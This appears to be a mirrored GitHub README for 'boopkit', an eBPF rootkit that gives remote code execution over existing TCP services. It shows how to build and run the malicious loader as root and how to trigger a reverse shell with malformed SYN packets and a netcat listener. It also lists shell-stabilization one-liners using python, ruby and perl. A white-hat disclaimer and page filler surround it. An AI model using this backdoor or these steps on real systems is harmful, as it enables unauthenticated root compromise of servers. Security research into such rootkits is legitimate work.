Git Product home page Git Product logo

boopkit's Introduction

Boopkit

A research project to demonstrate remote code injection over TCP with a malicious eBPF probe.

Disclaimer

I am a professional security researcher. These are white hat tools used for research purposes only.

Seriously please use these responsibly.

Demo

Install boopkit on a server that is already running any TCP service (EG: nginx, apache, tomcat, etc).

git clone [email protected]:kris-nova/boopkit.git
cd boopkit
make
sudo ./boopkit > /var/log/boop.log &

Trigger a reverse shell over an existing TCP service. Edit the remote launcher script and point it at any TCP server running on the exploited machine!

# edit ./remote/remote as needed
./remote/remote
python -c "import pty; pty.spawn('/bin/bash')"

Enjoy the root shell over unauthenticated TCP.

Components

eBPF Probe Malicious Userspace Program Remote Trigger
Responsible for sending tracepoint/tcp/tcp_bad_sum events to userspace Persistent process in Linux, that does the dirty work Remote way to trigger the RCE over a network and TCP server

eBPF Probe

Can be loaded into the kernel at runtime using the userspace loader program. The probe responds to tcp/tcp_bad_csum events and will pass the saddr (Source Address) up to userspace using an eBPF map.

Loader Program

This is the malicious program that will respond to the bad checksum packets sent to the server. Whenever a malicious packet is sent, the loader program responds with remote code execution.

Trigger/Remote

The trigger binary is a small C program that will send a malformed SYN request without a properly calculated checksum to the server.

The remote script wraps the trigger and will use netcat to listen for a reverse shell.

eBPF and Loader Compile Time Dependencies

  • 'clang'
  • 'linux-headers'
  • 'llvm'
  • 'libbpf'
  • 'lib32-glibc'

Boopkit runtime dependencies

  • Linux kernel with eBPF enabled/supported
  • Ncat running on the server
  • Root access :)

Reverse Shell Stabilization

After a successful /remote the shell will be very unsightly.

Select one of the commands to run in order to start a cleaner shell.

python -c "import pty; pty.spawn('/bin/bash')"
ruby -e "exec '/bin/bash'"
perl -e "exec '/bin/bash';"

Next move the newly created shell to the background on your local terminal.

Ctrl + z

Update the stty locally.

stty raw -echo && fg

Finally, reconfigure the terminal!

export TERM=xterm-256-color

Source: jasonturley.xyz

boopkit's People

Contributors

krisnova avatar

Watchers

avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.